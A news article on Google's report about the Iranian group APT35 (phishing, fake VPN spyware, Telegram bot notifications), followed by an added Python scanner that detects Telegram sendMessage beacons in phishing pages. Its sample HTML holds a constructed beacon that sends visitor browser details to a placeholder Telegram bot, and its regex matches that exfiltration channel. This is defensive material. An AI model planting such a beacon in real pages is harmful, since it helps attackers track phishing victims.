
Iranian hacking group continues to target US citizens

APT35 used phishing attacks and uploaded spyware onto Google Play Store

An Iranian hacking group has been targeting US citizens and organizations since 2017 and doesn’t seem to be letting up, according to a new Google report.

Google's Threat Analysis Group said a state-backed Iranian group known as APT35 targeted high-value individuals in the US and elsewhere. The hackers, also known as Charming Kitten, Phosphorus, Ajax Security, and NewsBeef, have attacked high-value accounts in government, academia, journalism, NGOs, foreign policy, and national security since 2017. 

APT35 is also one of the groups that tried to disrupt the 2020 US election cycle by targeting campaign staffers. 

The group has hijacked accounts, deployed malware, and used novel techniques to conduct espionage aligned with the interests of the Iranian government, according to Google TAG team member Ajax Bash.

Earlier this year, the hackers compromised a website affiliated with a UK university to host a phishing kit.

“Attackers sent email messages with links to this website to harvest credentials for platforms such as Gmail, Hotmail, and Yahoo. Users were instructed to activate an invitation to a (fake) webinar by logging in. The phishing kit will also ask for second-factor authentication codes sent to devices,” said Bash.

Bash added that credential phishing through a compromised website demonstrates these attackers will go to great lengths to appear legitimate – “as they know it's difficult for users to detect this kind of attack”.

In May 2020, the team discovered that APT35 attempted to upload spyware to the Google Play Store. The app disguised itself as VPN software, but it could steal sensitive information such as call logs, text messages, contacts, and location data from devices if installed.

“Google detected the app quickly and removed it from the Play Store before any users had a chance to install it. Although Play Store users were protected, we are highlighting the app here as TAG has seen APT35 attempt to distribute this spyware on other platforms as recently as July 2021,” said Bash.

Among the most notable attacks by the Iranian hackers was the impersonation of conference officials to conduct phishing attacks. “Attackers used the Munich Security and the Think-20 (T20) Italy conferences as lures in non-malicious first contact email messages to get users to respond. When they did, attackers sent them phishing links in follow-on correspondence,” said Bash.


The hackers also used Telegram for operator notifications. The attackers embed JavaScript into their phishing pages that notifies them whenever a page is loaded. The notification is sent through the Telegram Bot API's sendMessage method, which lets anyone operating a Telegram bot post a message to a public channel.

“The attackers use this function to relay device-based data to the channel, so they can see details such as the IP, useragent, and locales of visitors to their phishing sites in real-time. We reported the bot to Telegram, and they have taken action to remove it,” said Bash.
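As an added example (not code from Google's report or this article), here is a small Python check a defender can run over a captured phishing page to flag the beacon pattern described above: a Telegram Bot API sendMessage URL, the chat it reports to, and whether the page also reads browser fingerprint fields. The sample HTML, bot id and secret are constructed placeholders.

```python
import re
from dataclasses import dataclass
from typing import List, Optional
from urllib.parse import parse_qs

# Constructed sample of a captured phishing page; the bot id/secret are fake placeholders.
SAMPLE_HTML = """<html><body><form>...</form>
<script>
var u = "https://api.telegram.org/bot1234567890:CONSTRUCTED_FAKE_SECRET/sendMessage?chat_id=-100111&text="
      + encodeURIComponent(navigator.userAgent + " " + navigator.language);
new Image().src = u;
</script></body></html>"""

# Telegram Bot API call shape: https://api.telegram.org/bot<id>:<secret>/sendMessage?chat_id=...
# Only the numeric bot id is kept in the report so the secret is never copied into findings.
TELEGRAM_BEACON_RE = re.compile(
    r"https?://api\.telegram\.org/bot(?P<botid>\d+):(?P<secret>[A-Za-z0-9_-]+)/"
    r"sendMessage(?P<query>\?[^\s'\"<>]*)?",
    re.IGNORECASE,
)

# Client fields the report says are relayed (user agent, locale); IP is seen server-side.
CLIENT_DATA_RE = re.compile(r"navigator\.(userAgent|language|languages)")


@dataclass
class Finding:
    bot_id: str                 # numeric part of the token, safe to include in a report
    chat_id: Optional[str]      # destination channel/chat, if present in the query string
    collects_client_data: bool  # page also reads navigator.userAgent / language


def scan_page(html: str) -> List[Finding]:
    """Return one Finding per Telegram sendMessage beacon found in the page source."""
    findings: List[Finding] = []
    collects = bool(CLIENT_DATA_RE.search(html))
    for match in TELEGRAM_BEACON_RE.finditer(html):
        query = (match.group("query") or "").lstrip("?")
        params = parse_qs(query)  # blank values (e.g. text=) are dropped
        chat_id = params.get("chat_id", [None])[0]
        findings.append(Finding(match.group("botid"), chat_id, collects))
    return findings


if __name__ == "__main__":
    for f in scan_page(SAMPLE_HTML):
        print(f"Telegram beacon: bot id {f.bot_id}, chat {f.chat_id}, "
              f"reads client data: {f.collects_client_data}")
```

The same regex can be used as a content signature in a web proxy or sandbox rule, and the bot id in a finding is the value to include when reporting the bot to Telegram.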

This year, Google has warned over 50,000 account holders they may have been targeted by state-backed attempts to hack them using phishing or malware, a nearly 33% increase from this time in 2020. 
